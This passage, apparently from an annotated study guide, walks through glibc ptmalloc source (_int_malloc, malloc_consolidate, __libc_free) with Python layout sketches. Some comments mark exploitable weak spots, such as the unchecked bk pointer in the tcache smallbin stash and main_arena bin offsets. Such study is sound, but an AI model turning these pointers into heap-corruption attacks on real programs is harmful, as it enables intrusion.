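    if with_have_fastchunks:
        # Newer layout: extra int plus explicit padding up to 8-byte alignment.
        fields += [("have_fastchunks", ctypes.c_int32),
                   ("_pad", ctypes.c_int32)]
    fields += [
        ("fastbinsY", PTR * NFASTBINS),
        ("top", PTR),
        ("last_remainder", PTR),
        ("bins", PTR * (NBINS * 2 - 2)),
        ("binmap", ctypes.c_uint32 * BINMAPSIZE),
    ]

    class MallocState(ctypes.Structure):
        _fields_ = fields

    return MallocState


def bin_at_offset(layout, i: int) -> int:
    """Offset of the fake chunk header bin_at(i): &bins[(i-1)*2] minus offsetof(fd)."""
    return layout.bins.offset + (i - 1) * 2 * 8 - 16


if __name__ == "__main__":
    for flag in (False, True):
        layout = malloc_state_layout(flag)
        print(flag, "top at", layout.top.offset,
              "unsorted bin at main_arena +", bin_at_offset(layout, 1))
```

With the structure exactly as listed above the unsorted bin header sits at main_arena + 88; with the additional `have_fastchunks` field it moves to main_arena + 96.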

heap_info

#define HEAP_MIN_SIZE (32 * 1024) 
#ifndef HEAP_MAX_SIZE
# ifdef DEFAULT_MMAP_THRESHOLD_MAX
# define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX)
# else
# define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */
# endif
#endif
/* HEAP_MIN_SIZE and HEAP_MAX_SIZE limit the size of mmap()ed heaps that are dynamically created for multi-threaded programs. The maximum size must be a power of two, for fast determination of which heap belongs to a chunk. It should be much larger than the mmap threshold, so that requests with a size just below that threshold can be fulfilled without creating too many heaps. */
/***************************************************************************/
/* A heap is a single contiguous memory region holding (coalesceable) malloc_chunks. It is allocated with mmap() and always starts at an address aligned to HEAP_MAX_SIZE. */
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
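Because every non-main heap starts at an address aligned to HEAP_MAX_SIZE, the heap_info header that owns a chunk can be found by masking the chunk address. A minimal sketch, assuming the 64-bit default of HEAP_MAX_SIZE = 64 MiB (2 * DEFAULT_MMAP_THRESHOLD_MAX); `heap_for_ptr` mirrors the idea of the glibc macro of the same name, and the addresses are made-up examples.

```python
HEAP_MAX_SIZE = 64 * 1024 * 1024   # assumption: 64-bit default (0x4000000)


def heap_for_ptr(ptr: int) -> int:
    """Address of the heap_info header of the heap that contains ptr."""
    return ptr & ~(HEAP_MAX_SIZE - 1)


if __name__ == "__main__":
    for chunk in (0x7ffff0000b20, 0x7ffff3fffff0, 0x7ffff4000010):
        print(hex(chunk), "->", hex(heap_for_ptr(chunk)))
```

This is also how a chunk with the NON_MAIN_ARENA bit set is mapped back to its arena: the ar_ptr field is read from the heap_info found at the masked address.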

Source code

__libc_malloc

void *
__libc_malloc(size_t bytes)
{
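//First check whether a malloc hook function is installed. If so, call it and return. The hook is mainly used to allocate memory while a process creates a new thread, or to support a user-supplied allocation function.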
mstate ar_ptr;
void *victim;

void *(*hook)(size_t, const void *) = atomic_forced_read(__malloc_hook);
if (__builtin_expect(hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS(0));

//Get the arena pointer. If no arena can be obtained, return; otherwise call _int_malloc() to allocate the memory.
arena_get(ar_ptr, bytes);

victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */


//If _int_malloc() fails, check whether the arena in use is the main arena, then retry with another arena; the rest is arena lookup and unlocking.
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}

if (ar_ptr != NULL)
(void)mutex_unlock(&ar_ptr->mutex);

assert(!victim || chunk_is_mmapped(mem2chunk(victim)) ||
ar_ptr == arena_for_chunk(mem2chunk(victim)));
return victim;
}

__malloc_hook

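__malloc_hook initially points to malloc_hook_ini, the initialization function of ptmalloc. It mainly initializes the global state machine and the chunk data structures. The malloc_hook_ini function looks like this: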

/* Initialization. */
static void *
malloc_hook_ini (size_t sz, const void *caller)
{
//First set __malloc_hook to NULL, then call ptmalloc_init, and finally call back into __libc_malloc.
__malloc_hook = NULL;
ptmalloc_init ();
return __libc_malloc (sz);
}

_int_malloc

static void *
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
unsigned int idx; /* associated bin index */
mbinptr bin; /* associated bin */

mchunkptr victim; /* inspected/selected chunk */
INTERNAL_SIZE_T size; /* its size */
int victim_index; /* its bin index */

mchunkptr remainder; /* remainder from a split */
unsigned long remainder_size; /* its size */

unsigned int block; /* bit map traverser */
unsigned int bit; /* bit map traverser */
unsigned int map; /* current word of binmap */

mchunkptr fwd; /* misc temp for linking */
mchunkptr bck; /* misc temp for linking */

const char *errstr = NULL;

/*
Convert request size to internal form by adding SIZE_SZ bytes
overhead plus possibly more to obtain necessary alignment and/or
to obtain a size of at least MINSIZE, the smallest allocatable
size. Also, checked_request2size traps (returning 0) request sizes
that are so large that they wrap around zero when padded and
aligned.
*/

checked_request2size(bytes, nb);

/*
If the size qualifies as a fastbin, first check corresponding bin.
This code is safe to execute even if av is not yet initialized, so we
can try it without checking, which saves some time on this fast path.
*/

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
//Compute the index of the fast bin that matches the requested chunk size.
idx = fastbin_index(nb);

//Take the first chunk off the list and return the user memory through chunk2mem().
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp = *fb;
do
{
victim = pp;
if (victim == NULL)
break;
} while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim);
if (victim != 0)
{
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr(check_action, errstr, chunk2mem(victim), av);
return NULL;
}
check_remalloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

/*
If a small request, check regular bin. Since these "smallbins"
hold one size each, no searching within bins is necessary.
(For a large request, we need to wait until unsorted chunks are
processed to find best fit. But for small ones, fits are exact
anyway, so we can check now, which is faster.)
*/

if (in_smallbin_range(nb))
{
idx = smallbin_index(nb);

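//Use the index to get the head of the circular doubly linked free list of the small bin; the if statement assigns the last chunk to victim.
bin = bin_at(av, idx);
//If victim equals the list head, the list is empty and nothing can be allocated from this small bin.
//Everything below handles the case where victim differs from the list head.
if ((victim = last(bin)) != bin)
{
//If victim is 0, the small bin has not been initialized as a circular doubly linked list yet; call malloc_consolidate() to consolidate the chunks in the fast bins.
if (victim == 0) /* initialization check */
malloc_consolidate(av);
//Otherwise a suitable chunk exists in this bin. Take victim off the small bin list and set its inuse flag, which is the lowest bit of the size field of the physically next chunk. The unlink() macro could also be used to remove victim from the small bin, but it is not used here.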
else
{
bck = victim->bk;
//The classic integrity check: verify that the fd pointer of victim's bck still points to victim, to detect a corrupted list.
if (__glibc_unlikely(bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
//Unlink victim from the list.
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;

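//Next check whether the current arena is a non-main arena. If so, set the NON_MAIN_ARENA flag bit in the size field of victim. Finally call chunk2mem() to get the usable memory pointer of the chunk and return it to the application.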
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}
}

tcache
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

if ((victim = last (bin)) != bin)
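//victim is the chunk to unlink, i.e. the last chunk in the small bin
//this if checks whether the small bin for the requested size holds any chunk; if it does, victim is unlinked
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))//integrity check on the small bin doubly linked list: victim->bk->fd must still point to victim
//if the bk pointer of victim has been hijacked here, bck->fd no longer points to victim and the error is triggered
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);//set the prev_inuse bit of the next (higher-address) chunk
bin->bk = bck;//unlink victim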
bck->fd = bin;
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);//tcache index for this size
if (tcache && tc_idx < mp_.tcache_bins)//the index is within the tcache bin range, i.e. this size is handled by the tcache
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count//while the tcache bin is not full
&& (tc_victim = last (bin)) != bin)//and the small bin is not empty; tc_victim is the last chunk in the small bin
{
if (tc_victim != 0)
{
bck = tc_victim->bk;//the bk pointer of tc_victim is read without any doubly linked list integrity check on bck, so the bk pointer of tc_victim can be attacked
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;//unlink tc_victim from the small bin
bck->fd = bin;//with a forged bck, this writes the address of a bin (main_arena+96) to bck->fd
tcache_put (tc_victim, tc_idx);//link tc_victim into the tcache list tc_idx
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/

else
{
idx = largebin_index(nb);
if (have_fastchunks(av))
malloc_consolidate(av);
}

  /*
Process recently freed or remaindered chunks, taking one only if
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.

The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request.
*/

for (;;)
{
int iters = 0;
//Walk the circular doubly linked list of the unsorted bin backwards; the walk ends when only the list head is left.
while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))
{
//Check that the chunk being visited is valid.
bck = victim->bk;
if (__builtin_expect(victim->size <= 2 * SIZE_SZ, 0) || __builtin_expect(victim->size > av->system_mem, 0))
malloc_printerr(check_action, "malloc(): memory corruption",
chunk2mem(victim), av);
size = chunksize(victim);

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/

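//1. If a small-bin-sized chunk is requested, the unsorted bin holds exactly one chunk, that chunk is the last remainder chunk, and its size is larger than the requested size plus MINSIZE, then the requested chunk is split off from it.
//This is the only case in which a small-bin-sized request is served by splitting a chunk in the unsorted bin; the optimization helps CPU cache locality.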
if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE))
{
/* split and reattach remainder */
//Split this chunk.
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks(av);
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

//Set the headers of the chunk that is split off and of the remaining last remainder chunk.
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

//Unlink the chunk being visited.
/* remove from unsorted list */
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);

/* Take now instead of binning if exact fit */

//2. If the size of the chunk being visited equals nb, set the prev_inuse bit of the physically next chunk, return the pointer, and finish the allocation.
if (size == nb)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* place chunk in bin */

//3. If the chunk being visited is of small bin size, link it into the small bins.
if (in_smallbin_range(size))
{
victim_index = smallbin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;
}
else
{
//4. If the chunk being visited is of large bin size, link it into the large bins.
victim_index = largebin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
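//When the large bin already holds chunks, the chunk must be linked in at the right position.
//This code shows that a large chunk can sit on two circular doubly linked lists: one contains every chunk in the large bin; the other is the chunk size list, which links the first chunk of each distinct size in size order. A traversal can therefore skip a whole run of equal-sized chunks and move straight to the next different size, which speeds up walking the large bin.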
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert((bck->bk->size & NON_MAIN_ARENA) == 0);
if ((unsigned long)(size) < (unsigned long)(bck->bk->size))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
//Walk the chunk size list forwards until the first chunk whose size is less than or equal to the size of the current chunk is found.
else
{
assert((fwd->size & NON_MAIN_ARENA) == 0);
while ((unsigned long)size < fwd->size)
{
fwd = fwd->fd_nextsize;
assert((fwd->size & NON_MAIN_ARENA) == 0);
}


if ((unsigned long)size == (unsigned long)fwd->size)
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
//When the large bin is empty, link the chunk in directly.
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

//If the unsorted bin holds more than 10000 chunks, stop after at most 10000 iterations, so that a long unsorted bin does not slow down allocation.
#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}



   /*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/

//If the requested chunk is of large bin size, look at the matching large bin. If that bin is empty, or even its largest chunk is too small, nothing can be allocated from it. Otherwise walk the large bin to find a suitable chunk.
if (!in_smallbin_range(nb))
{
bin = bin_at(av, idx);

/* skip scan if empty or largest chunk is too small */
if ((victim = first(bin)) != bin &&
(unsigned long)(victim->size) >= (unsigned long)(nb))
{
victim = victim->bk_nextsize;
//Walk the chunk size list backwards and leave the loop at the first chunk whose size is greater than or equal to the requested size.
while (((unsigned long)(size = chunksize(victim)) <
(unsigned long)(nb)))
victim = victim->bk_nextsize;

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
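//If the chosen victim is not the last chunk in the large bin and more than one chunk has the same size as victim, then victim is a node of the chunk size list. To avoid adjusting the chunk size list, that node should not be removed, so the chunk at victim->fd is used as the candidate instead. Chunks in a large bin are sorted by size, so chunks of equal size are always adjacent, and the chunk at victim->fd is guaranteed to have the same size as victim.
//The chunk that gets unlinked is therefore the next chunk of the same size after victim, which saves work because the chunk size list does not have to be modified.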
if (victim != last(bin) && victim->size == victim->fd->size)
victim = victim->fd;

//Compute the size left over after splitting victim, then call the unlink() macro to remove victim from the large bin.
remainder_size = size - nb;
unlink(av, victim, bck, fwd);

//5.1. If the remainder after splitting victim would be smaller than MINSIZE, hand out the whole victim.
/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}

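//5.2. Split the requested chunk off victim and add the remainder to the unsorted bin as a new chunk. If the remainder is of large bin size, set its chunk size list pointers to NULL: chunks in the unsorted bin are not sorted, so these two pointers are unused and must be cleared.
//Key point: the remainder of a split chunk goes into the unsorted bin.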
/* Split */
else
{
remainder = chunk_at_offset(victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}

//At this point a suitable chunk has been found in the large bin by best fit. Call chunk2mem() to get the usable memory pointer of the chunk and return it to the application.
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

   /*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/

//Get the free list of the next adjacent bin and the value of its bit in binmap. Binmap records whether each bin holds free chunks. It is managed in blocks: each block is one int with 32 bits, so it covers 32 bins. Using binmap speeds up the check for whether a bin holds free chunks. Only bins larger than the one matching the request are examined here.
++idx;
bin = bin_at(av, idx);
block = idx2block(idx);
map = av->binmap[block];
bit = idx2bit(idx);

//Walk the blocks of binmap until a non-zero block is found or all blocks have been visited. After leaving the loop, bin is set to the bin of the first bit of that block and bit is set to 1. Any bin found in this block that holds a free chunk is guaranteed to hold one that is large enough.
for (;;)
{
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0)
{
do
{
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
} while ((map = av->binmap[block]) == 0);

bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
}

// Inside the block, advance bin by bin until a set bit is found; the bin for that bit should contain free chunks.
/* Advance to bin with set bit. There must be one. */
while ((bit & map) == 0)
{
bin = next_bin(bin);
bit <<= 1;
assert(bit != 0);
}

// Take the last chunk of the bin as victim.
/* Inspect the bin. It is likely to be non-empty */
victim = last(bin);

// If victim equals the bin header, the bin is empty and its binmap bit was stale: clear the bit, move to the next bin, and shift bit left by one (multiply by 2).
/* If a false alarm (empty bin), clear the bit. */
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}


//6. The last chunk of this bin is large enough: read its size, compute what remains after carving out nb, and unlink victim from the bin. The rest mirrors step 5; any remainder goes into the unsorted bin.
else
{
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
assert((unsigned long)(size) >= (unsigned long)(nb));

remainder_size = size - nb;

/* unlink */
unlink(av, victim, bck, fwd);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}

/* Split */
else
{
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks 2";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

use_top:
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (have_fastchunks(av))
{
malloc_consolidate(av);
/* restore original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
else
{
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}
}
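
The binmap scan in the listing above can be modeled in a few lines. The following Python sketch is an illustration, not glibc code. It assumes the usual constants (NBINS = 128, BINMAPSHIFT = 5), represents av->binmap as a plain list of four integers, and uses a made-up helper name, next_marked_bin. It leaves out the false-alarm path that clears stale bits.

```python
BINMAPSHIFT = 5
BITSPERMAP = 1 << BINMAPSHIFT      # 32 bins per block
NBINS = 128
BINMAPSIZE = NBINS // BITSPERMAP   # 4 blocks


def idx2block(i):
    """Index of the binmap block that holds the bit for bin i."""
    return i >> BINMAPSHIFT


def idx2bit(i):
    """Bit mask for bin i inside its block."""
    return 1 << (i & (BITSPERMAP - 1))


def next_marked_bin(binmap, idx):
    """Return the first bin index above idx whose bit is set.

    None models the `goto use_top` case. Hypothetical helper for illustration.
    """
    idx += 1
    block = idx2block(idx)
    if block >= BINMAPSIZE:
        return None
    map_ = binmap[block]
    bit = idx2bit(idx)

    # Skip the rest of this block if no bit at or above `bit` is set.
    if bit > map_:
        while True:
            block += 1
            if block >= BINMAPSIZE:
                return None            # out of bins
            map_ = binmap[block]
            if map_ != 0:
                break
        idx = block << BINMAPSHIFT     # first bin of the new block
        bit = 1

    # Advance to the bin with a set bit; one must exist at this point.
    while (bit & map_) == 0:
        idx += 1
        bit <<= 1
    return idx


# Mark bin 70 as non-empty, the way mark_bin() would.
demo_map = [0] * BINMAPSIZE
demo_map[idx2block(70)] |= idx2bit(70)
```

With only bin 70 marked, a search starting from bin 64 stays in the same block, while a search starting from bin 10 first skips two empty blocks.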

top chunk

use_top:  
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (have_fastchunks (av))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
else
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}

malloc_consolidate

static void malloc_consolidate(mstate av)
{
mfastbinptr *fb; /* current fastbin being consolidated */
mfastbinptr *maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;
mchunkptr bck;
mchunkptr fwd;

/*
If max_fast is 0, we know that av hasn't
yet been initialized, in which case do so below
*/

// A non-zero global_max_fast means ptmalloc is already initialized. Clear the fastbin flag of the arena (the flag says that its fast bins hold free chunks), because every fast bin is about to be emptied.
if (get_max_fast() != 0)
{
clear_fastchunks(av);

unsorted_bin = unsorted_chunks(av);

/*
Remove each chunk from fast bin and consolidate it, placing it
then in unsorted bin. Among other reasons for doing this,
placing in unsorted bin avoids needing to calculate actual bins
until malloc is sure that chunks aren't immediately going to be
reused anyway.
*/

// maxfb points at the last fast bin and fb at the first; then iterate over every fast bin.
maxfb = &fastbin(av, NFASTBINS - 1);
fb = &fastbin(av, 0);
do
{
// Atomically swap the bin head with 0 and keep the old head in p. A non-zero p means the bin held chunks; the bin is now empty and the detached list is walked chunk by chunk.
p = atomic_exchange_acq(fb, 0);
if (p != 0)
{
do
{
check_inuse_chunk(av, p);
nextp = p->fd;

/* Slightly streamlined version of consolidation code in free() */
size = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

// Check whether the physically previous chunk is free and merge backward first. The result is not linked into the unsorted bin yet, because the physically next chunk has not been examined.
// When the previous chunk is free, prev_size of the current chunk holds its size: add it to size, move p back to the previous chunk, and unlink that chunk from its free list.
if (!prev_inuse(p))
{
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long)prevsize));
unlink(av, p, bck, fwd);
}

// If the next chunk is not the top chunk, check whether it is in use.
if (nextchunk != av->top)
{
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

// The next chunk is free: unlink it from its free list and add its size to the merged chunk.
if (!nextinuse)
{
size += nextsize;
unlink(av, nextchunk, bck, fwd);
}
// The next chunk is in use: clear its PREV_INUSE bit, which marks the current chunk as free.
else
clear_inuse_bit_at_offset(nextchunk, 0);

// Link the merged chunk into the unsorted bin's circular doubly linked list.
first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

// If the merged chunk is in large bin range, set fd_nextsize and bk_nextsize to NULL; both fields are unused in the unsorted bin.
// Note that these fields are deliberately wiped here.
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

// Set the size of the merged free chunk with PREV_INUSE set, because two adjacent chunks may never both be free. Then finish linking it into the unsorted bin and write its foot (its own size). The foot lives in the prev_size field of the next chunk and is only valid while the chunk is free.
set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}

// The next chunk is the top chunk: merge the current chunk into top and update top's size.
else
{
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

// Repeat until every chunk of the current fast bin has been processed.
} while ((p = nextp) != 0);
}
// Repeat until every fast bin has been processed.
} while (fb++ != maxfb);
}
// ptmalloc is not initialized yet: initialize it.
else
{
malloc_init_state(av);
check_malloc_state(av);
}
}

__libc_free

    void __libc_free(void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

// If a free hook is installed, call it and return. The hook exists mainly for use during thread creation or to plug in a user-supplied free function.
void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS(0));
return;
}

if (mem == 0) /* free(0) has no effect */
return;

// Convert the user pointer into a chunk pointer.
p = mem2chunk(mem);

// A chunk obtained through mmap() is released with munmap_chunk(), which calls munmap(). Before that, the dynamic mmap threshold adjustment (enabled by default) is applied: if the chunk is larger than the current mmap threshold and no larger than the maximum mmap threshold, the mmap threshold is set to the chunk size and the trim threshold to twice that value. By default both thresholds are 128KB. Then return.
if (chunk_is_mmapped(p)) /* release mmapped memory. */
{
/* see if the dynamic brk/mmap threshold needs adjusting */
if (!mp_.no_dyn_threshold && p->size > mp_.mmap_threshold && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
{
mp_.mmap_threshold = chunksize(p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk(p);
return;
}

// Look up the arena that manages this chunk, then let _int_free() do the actual work.
ar_ptr = arena_for_chunk(p);
_int_free(ar_ptr, p, 0);
}
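
The dynamic threshold rule for mmapped chunks described above can be sketched as follows. This is a simplified Python model, not glibc code: the function name on_free_mmapped is made up, the chunk size is passed without flag bits, and DEFAULT_MMAP_THRESHOLD_MAX is assumed to be the 64-bit value (32MB).

```python
DEFAULT_MMAP_THRESHOLD = 128 * 1024            # initial mp_.mmap_threshold
DEFAULT_TRIM_THRESHOLD = 128 * 1024            # initial mp_.trim_threshold
DEFAULT_MMAP_THRESHOLD_MAX = 32 * 1024 * 1024  # assumption: 64-bit build


def on_free_mmapped(chunk_size,
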